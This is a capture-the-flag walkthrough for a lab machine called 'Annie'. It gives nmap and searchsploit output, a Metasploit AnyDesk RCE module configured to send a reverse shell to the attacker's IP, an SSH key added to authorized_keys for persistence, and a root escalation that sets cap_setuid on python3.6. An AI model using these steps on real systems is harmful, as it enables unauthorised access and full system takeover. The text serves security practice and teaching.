CTF : Annie
Informations
- IP: 10.10.26.92
- MYIP: 10.9.85.5
First enumeration
Basics
- NMAP
console$ sudo nmap -p- -A 10.10.26.92 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 23:04 CEST Nmap scan report for 10.10.26.92 Host is up (0.094s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 72:d7:25:34:e8:07:b7:d9:6f:ba:d6:98:1a:a3:17:db (RSA) | 256 72:10:26:ce:5c:53:08:4b:61:83:f8:7a:d1:9e:9b:86 (ECDSA) |_ 256 d1:0e:6d:a8:4e:8e:20:ce:1f:00:32:c1:44:8d:fe:4e (ED25519) 7070/tcp open ssl/realserver? | ssl-cert: Subject: commonName=AnyDesk Client | Not valid before: 2022-03-23T20:04:30 |_Not valid after: 2072-03-10T20:04:30 |_ssl-date: TLS randomness does not represent time Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 3306/tcp) HOP RTT ADDRESS 1 37.07 ms 10.9.0.1 2 109.16 ms 10.10.26.92 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 150.21 seconds
Vulnerabilities search
TCP/7070 seams to be an AnyDesk client service.
console$ searchsploit anydesk ------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------- --------------------------------- AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation | windows/local/40410.txt AnyDesk 5.4.0 - Unquoted Service Path | windows/local/47883.txt AnyDesk 5.5.2 - Remote Code Execution | linux/remote/49613.py ------------------------------------------------------------------------------------- ---------------------------------
Let's try the RCE exploit.
Exploit
I used msfconsole
use exploit/linux/misc/cve_2020_13160_anydesk
set RHOSTS 10.10.26.92
set LHOST 10.9.85.5
set TARGET 1
runAnd we got a shell :)
console$id uid=1000(annie) gid=1000(annie) groups=1000(annie),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare) $ cat user.txt
Got the user flag :)
consoleecho "ssh-rsa xxxxx" >> .ssh/authorized_keys
Now we can connect using SSH which is a more stable and rich than meterpreter.
Privilege escalation
Enumeration for privesc
First I search suid binaries owned by root :
console$ find / -user root -perm -4000 2>/dev/null /sbin/setcap /bin/mount /bin/ping /bin/su /bin/fusermount /bin/umount /usr/sbin/pppd /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/xorg/Xorg.wrap /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/arping /usr/bin/newgrp /usr/bin/sudo /usr/bin/traceroute6.iputils /usr/bin/chfn /usr/bin/gpasswd /usr/bin/chsh /usr/bin/passwd /usr/bin/pkexec
I first try to exploit pkexec through pwnkit but... nop !
After a looooong time searching I finally figured out that setcap was the way :)
Exploit
setcap is tool to set capabilities to files. So I decided to give python3.6 a god power :
console$ setcap cap_setuid=ep /usr/bin/python3.6 $ /usr/bin/python3.6 -c 'import os; os.setuid(0); os.system("/bin/sh")' # cat /root/root.txt
\o/